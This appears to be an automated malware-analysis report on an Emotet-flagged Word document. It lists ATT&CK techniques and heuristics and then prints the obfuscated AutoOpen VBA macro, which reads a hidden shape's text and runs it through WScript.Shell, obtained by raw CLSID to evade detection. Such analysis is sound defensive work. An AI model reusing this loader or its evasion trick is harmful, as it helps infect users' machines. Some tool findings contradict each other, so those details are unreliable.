Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1218.011 Signed Binary Proxy Execution: Rundll32
- T1059.001 PowerShell
- T1140 Deobfuscate or Obfuscate Malicious Code
- T1566.001 Spearphishing Attachment
The sample contains VBA macros with an AutoOpen function, indicative of malicious intent. It leverages the dangerous WScript.Shell COM object to execute commands, likely for downloading and running a secondary payload. The ClamAV detection explicitly names Emotet, a known downloader family.
Heuristics (9)
- ClamAV: Doc.Downloader.Emotet-6826446-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Emotet-6826446-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS). VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. Matched line in script: `End Select Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD) On Error Resume Next`
- GetObject call (high, OLE_VBA_GETOBJ). Matched line in script: `End Select Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD) On Error Resume Next`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Reference to PowerShell (high, SC_STR_POWERSHELL).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5001 bytes |

SHA-256: 91524fbfb3a552d96b10feec9f1abe40069d4b908c784baa9e8fd0e0a6770cd4

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 112 of 173 identifiers look randomly generated (e.g. 'NhQLQfwlaBSJn'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "iHOBqSAldadB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case rssVuadT
Case 7431461
bcPiiiK = CBool(GnVMX)
cRvtrcHL = 131039611
HudsIUj = CBool(OwOPq)
Case 145014689
BzKzRTiVD = CBool(cfjcYRPIp)
oFRvlHM = Atn(aaMbZupdz)
CGcYaz = CBool(pzhpfwHB)
KwhOMKHju = Atn(190796375 * CLng(217435300))
End Select
Set pmuUB = Shapes("NhQLQfwlaBSJn")
On Error Resume Next
Select Case bGtwlAO
Case 234272584
lhAlL = CBool(kNliC)
jobhj = 241503370
WYjvpCIBA = CBool(ZwnjvJjNM)
Case 36830349
rKNWZVuRS = CBool(BPXMdF)
LjCAjPLi = Atn(XlfrUX)
sfNTZQj = CBool(jijXjP)
SEwCdCz = Atn(50389999 * CLng(309798784))
End Select
WzKifFWORWi = "" + fhPmMvC + wJmaw + AjoBzA + tRtcuXS + pmuUB.TextFrame.TextRange.Text + pDSlHaO + GiEzIkt + jikIk + LNmKz + UbpTkTsw
On Error Resume Next
Select Case rHYfT
Case 283156215
mTlapsdw = CBool(KazuGNRok)
nCYvz = 268195053
EStiwcZo = CBool(widBQn)
Case 149083892
CoLEvipj = CBool(KDkOXolGn)
CONwYF = Atn(RnLisAfss)
diIoE = CBool(CSWEBYqru)
cURpqnw = Atn(29794688 * CLng(83148233))
End Select
On Error Resume Next
Select Case tiWhQtm
Case 116477639
jIKwtM = CBool(BCtmQBzm)
ClrtdmQh = 210593100
YHjzTfP = CBool(FTsaaEK)
Case 136987834
wdNsijzOH = CBool(YltrcSUnc)
FZHBWtT = Atn(bLmjJwUES)
qXiiMkrs = CBool(bPIFQh)
kWWMVoQGm = Atn(317801614 * CLng(56140133))
End Select
Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
On Error Resume Next
Select Case zNrwwL
Case 68721804
otcqjXQU = CBool(BWjFsCc)
cTNEtvM = 151166701
XijmhD = CBool(dwwhnrN)
Case 159090100
JZjJMFKP = CBool(TrwcuzP)
PzhkkU = Atn(GbvEvl)
GpRkWfND = CBool(YTMNLd)
BBRTb = Atn(87935855 * CLng(282064522))
End Select
On Error Resume Next
Select Case hpIwX
Case 110413520
pGmSwRUXM = CBool(NHfBvFU)
TDjMDT = 6529678
MPllw = CBool(FftuXj)
Case 263227701
AuFPMS = CBool(DmkohDN)
dDTRvF = Atn(maiwC)
IAhnd = CBool(CpGoG)
aIdAzPMr = Atn(101102913 * CLng(106969043))
End Select
Const RmcCa = 0
On Error Resume Next
Select Case pmaMFKnK
Case 293360880
jcDLa = CBool(HjiXiGm)
ZMmTZDZz = 126278805
kSBEvQL = CBool(CzPLrC)
Case 85041545
OcZUCiz = CBool(nsXUlociJ)
bHXDkOM = Atn(EpSNUk)
wpzYw = CBool(CTJRDsq)
NUhCRaF = Atn(22526869 * CLng(74229139))
End Select
On Error Resume Next
Select Case ZWprZjMP
Case 211837363
kAwHZJPD = CBool(WXsHuwKTz)
YrRAahHlD = 193622773
GuMRjLSJk = CBool(uOIBI)
Case 216439552
vsONPW = CBool(qSzYZ)
YMatQd = Atn(qOmsJMki)
JzSAspK = CBool(jrYEaN)
tkRkio = Atn(92914447 * CLng(244321475))
End Select
On Error Resume Next
Select Case RZbIIz
Case 172545123
fPdiTNI = CBool(UtuvVBKNz)
BflPU = 213595769
siCSP = CBool(nrZPIL)
Case 17009969
jwtYK = CBool(MuPONKBz)
tPuwbaiGi = Atn(aGEvm)
CvzVi = CBool(rKuuwPnEE)
qwjzNO = Atn(176355816 * CLng(228591513))
End Select
On Error Resume Next
Select Case NjfbdM
Case 300889489
dXqSa = CBool(wjpZYv)
ETZALmtb = 221284423
jLzCYjLKa = CBool(HtVlFzA)
Case 266104435
wAUuWI = CBool(FbRazf)
fJHdMaAiP = Atn(UhKzouLlF)
lrLRat = CBool(iksza)
zqbwWnO = Atn(102803920 * CLng(121113587))
End Select
On Error Resume Next
Select Case TASoZLpmA
Case 259174217
pOUcNrUa = CBool(VJBcfuAPt)
bfNUjKiGF = 301322238
CokWtdL = CBool(OwuObVK)
Case 336269912
JiKatELIc = CBool(kSflPjYSU)
FlRplf = Atn(hRlwZKswa)
zJjZORjb = CBool(iNiiDC)
ijXNVpOIi = Atn(284168830 * CLng(281235694))
End Select
lWpSaF.Run# WzKifFWORWi, RmcCa
On Error Resume Next
Select Case SwXPMw
Case 264960689
WvcDizt = CBool(cklritc)
ialXMJWUH = 298761793
XZTvEiIl = CBool(dIwvdO)
Case 311931377
sMmYUclm = CBool(QQNYI)
pRWFJpjJW = Atn(QRWiq)
zNkbuHHDw = CBool(JuRsXnVM)
dHJmw = Atn(79740558 * CLng(21389483))
End Select
On Error Resume Next
Select Case YOYjilLEj
Case 107707173
DYshJzQXc = CBool(oknNw)
EjoWcuC = 301418533
QLCKdIVWT = CBool(juVTKCz)
Case 131585393
jilSkLHU = CBool(uOIWwotmO)
wATOTk = Atn(fiPdTf)
RJOisSz = CBool(oabFTMw)
aYokVkQQ = Atn(121684110 * CLng(224527147))
End Select
End Sub